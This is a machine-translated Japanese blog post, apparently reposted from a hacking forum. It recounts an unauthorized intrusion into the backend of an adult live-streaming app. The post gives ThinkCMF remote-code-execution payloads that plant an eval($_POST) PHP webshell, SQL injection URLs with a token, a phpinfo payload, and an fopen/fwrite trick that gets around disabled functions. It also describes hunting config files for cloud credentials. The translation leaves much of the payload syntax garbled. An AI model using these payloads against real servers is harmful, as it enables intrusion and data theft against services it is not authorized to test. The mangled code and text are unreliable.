タイトル：特定の色Xライブブロードキャストアプリの浸透を一度録音します

https://hacker.bz/t/entry/15340-%E3%82%BF%E3%82%A4%E3%83%88%E3%83%AB%EF%BC%9A%E7%89%B9%E5%AE%9A%E3%81%AE%E8%89%B2x%E3%83%A9%E3%82%A4%E3%83%96%E3%83%96%E3%83%AD%E3%83%BC%E3%83%89%E3%82%AD%E3%83%A3%E3%82%B9%E3%83%88%E3%82%A2%E3%83%97%E3%83%AA%E3%81%AE%E6%B5%B8%E9%80%8F%E3%82%92%E4%B8%80%E5%BA%A6%E9%8C%B2%E9%9F%B3%E3%81%97%E3%81%BE%E3%81%99/

Followers

晴れた夜、私はTwitterで歩くことに興奮していましたが、突然、次の推奨フォローはXXXXビデオの名刺であることがわかりました。

これ、これ、これ、これ、私は真面目な人です、Twitterがこれらを私にプッシュした理由はわかりません。これを実行し、プロモーションリンクを開き、アプリをダウンロードする必要があります。

このアプリは、開くとすぐに馴染みのある臭いを人々に与えます。 TP Twoによって開かれた可能性が高いようです。

携帯電話番号、フィドラーを登録してパッケージをキャッチして変更しますが、コンテンツは実際には目を引くものです

私はパケットを捕まえてURLを取得しましたが、これが単にthinkcmfであることがわかりましたか？私は微笑んで微笑んで、私はそれを脱ぐことはなかっただろうと思った。フロントデスクには非常に多くのRCEがありました。たとえ犬がいたとしても、私は数秒でそれをすることができました。しかし、私はすぐに現実に顔を平手打ちしました。

poc:payload1を実行：

/index.php?g=apim=oautha=fetchcontent=phpfile_put_contents('pass.php'、 '？php @eval（$ _ post [1]）;'）/Php

Payload2：

/？a=fetch;templatefile=public/indexprefix=''content=phpfile_put_contents('pass.php','?php@eval($_post [1]）; '）/php

Payload3：

？a=displaytemplatefile=％3c？php％20file_put_contents（％27mmphp％27、％27％3c％3fphp+eval（$ _ post _ post [％22x％22]）％3b％3f％3e％27）; die（）;

/？a=displaytemplatefile=data/runtime/logs/portal/yy_mm_dd.log最後に、M.Phpの1文字のトロイの木馬ファイルがディレクトリで生成され、もちろん他のペイロードとしても記述できます。

操作はトラと同じくらい激しいです。ファイル404を見ると、寒いでしょうか？

さらに、このアプリにはSQLインジェクション:インジェクションポイントもあります。

/index.php?g=appapim=videovideoid=1

注入ポイント2：

/index.php?g=appapim=autha=indexuid=1288889TOKEN=B69CDA34DFF2FA978A94B5583E7F5C9A

注入もクールです。 0日のリズムを取り出してほしいと思われますか？それを忘れて、耐えましょう。いくつかの調査の後、詳細は投稿されず、ここでは千の単語が省略されます。あなたがあまりにも多くのことを言ったら、それはすべて涙です.最後に、Phpinfoがリリースされ、ペイロードはバージョン7.2の上にあります。

/？a=fetchContent=？=phpinfo（）; exit（）;これはシェルに近いステップではなく、disable_functionsが非常に多く無効になっていることがわかります。

私はここでアサート関数を使用して書くことを試みました、そしてそれが行われたと思いましたが、結果はまだ返されました1

@Assert関数は機能しません。ここでは、file_get_contentsを読み取り、データベース構成ファイルを読み取ることができます

config.phpファイルを読み続けたとき、アプリをダウンロードしたときにAlibaba Cloud OSSに配置されたことを突然思い出しました。その構成ファイルにはAlibaba CloudキーとIDが必要であることは論理的ですが、結局のところ現実は非常に残酷であるため、Aliyunの文字さえ見ませんでした。

一部の構成ファイルで読み取るものは何もなく、データベースとRedisを外部で接続することはできません。そこで、シェルを書いて注意深く裏返し、file_put_contentsを使用してファイルを読み取ることを試みます。

不可能だと思われます。パラメーターの問題が原因ですか？ file_get_contentsは任意のファイルを読み取ることができますか、それともディレクトリを書き込むことができませんか？ /tmp/1.txtで書き込もうとすると、同じエラーも報告されました。 PHPはファイルを書き込むために他の機能も必要だと思ったので、w3schoolはひっくり返しました

123をi.txtに書き込み、ファイルを正常に書き込みます

PHPに文を書くようにしてください、そして、それはテンプレートが存在しないことを促します。どうすればいいですか？シェルが取得されたことがわかりました。 FWRITEパラメーターを注意深くご覧ください。 W+は書き込みを開くことで、R+は追加します。 1つのキャラクターを1つずつ書きたいですか？そうです、それはただ一人のキャラクターを1人のキャラクターに書くことです。a=fetchContent=％3c？=@$ fp=fopen（％221.php％22、％27a+％27）;％20fwrite（$ fp、％27％27）; exit（）;